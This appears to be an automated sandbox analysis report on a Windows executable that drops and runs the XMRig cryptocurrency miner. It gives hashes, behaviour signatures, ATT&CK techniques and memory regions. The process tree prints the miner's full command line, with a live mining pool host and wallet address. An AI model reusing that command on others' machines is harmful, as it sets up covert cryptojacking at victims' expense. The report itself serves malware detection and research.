Resubmissions

06-07-2024 19:03

240706-xqksaazhrm 10

21-06-2024 07:08

240621-hyl8razgpc 10

16-06-2024 18:48

240616-xf5ppswgmq 10

16-06-2024 18:34

240616-w759wasbqf 10

16-06-2024 18:21

240616-wzje5swajj 10

16-06-2024 18:08

240616-wqxams1ekf 10

16-06-2024 17:54

240616-whbzqsvcrn 10

16-06-2024 17:41

240616-v9q3aszhkf 10

16-06-2024 17:28

240616-v1237szgpc 10

Analysis

  • max time kernel
    1795s
  • max time network
    1796s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-06-2024 18:34

General

  • Target

    main - Copy (3).exe

  • Size

    6.9MB

  • MD5

    22c978ffaefef3389bf29068b9621661

  • SHA1

    5671972c1d70826fb85dced4c83c700dd282ea21

  • SHA256

    e6ee8e9b38e10a92a89e61b8655ca4fedcc381fd93cb36f43fe323132923dfcf

  • SHA512

    8a280cb782f0afab171d2e7955b75362e98cefd449d382004ef2568c2c230cd633a754b1dd5f0dc5e17407819e4dceb5b0cbb2647e279a6ec674b8d9484be26a

  • SSDEEP

    98304:7b5Ak7khMiyw0VREqfnle5EEPbxVhCQHSIMf:5LUMiywZqshDxaQHh

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 64 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Executes dropped EXE 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
    "C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4272
    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
      xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2568

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Subvert Trust Controls

1
T1553

Install Root Certificate

1
T1553.004

Modify Registry

1
T1112

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
    Filesize

    7.9MB

    MD5

    e2fe87cc2c7dab8ca6516620dccd1381

    SHA1

    f714ec0448325435103519452610cf7aadf8bbba

    SHA256

    d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4

    SHA512

    8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

  • memory/2568-14-0x000001F877C40000-0x000001F877C60000-memory.dmp
    Filesize

    128KB

  • memory/2568-15-0x000001F877CA0000-0x000001F877CC0000-memory.dmp
    Filesize

    128KB

  • memory/2568-16-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-17-0x000001F877CC0000-0x000001F877CE0000-memory.dmp
    Filesize

    128KB

  • memory/2568-18-0x000001F877CE0000-0x000001F877D00000-memory.dmp
    Filesize

    128KB

  • memory/2568-19-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-20-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-23-0x000001F877CE0000-0x000001F877D00000-memory.dmp
    Filesize

    128KB

  • memory/2568-22-0x000001F877CC0000-0x000001F877CE0000-memory.dmp
    Filesize

    128KB

  • memory/2568-21-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-24-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-25-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-26-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-27-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-28-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-29-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-30-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-31-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-32-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-33-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-34-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-35-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-36-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-37-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-38-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-39-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-40-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-41-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-42-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-43-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-44-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-45-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-46-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-47-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-48-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-49-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-50-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-51-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-52-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-53-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-54-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-55-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-56-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-57-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-58-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-59-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-60-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-61-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-62-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-63-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-64-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-65-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-66-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-67-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-68-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-69-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-70-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-71-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-72-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-73-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-74-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-75-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-76-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-77-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-78-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-79-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-80-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-81-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB

  • memory/2568-82-0x00007FF7BCE70000-0x00007FF7BD973000-memory.dmp
    Filesize

    11.0MB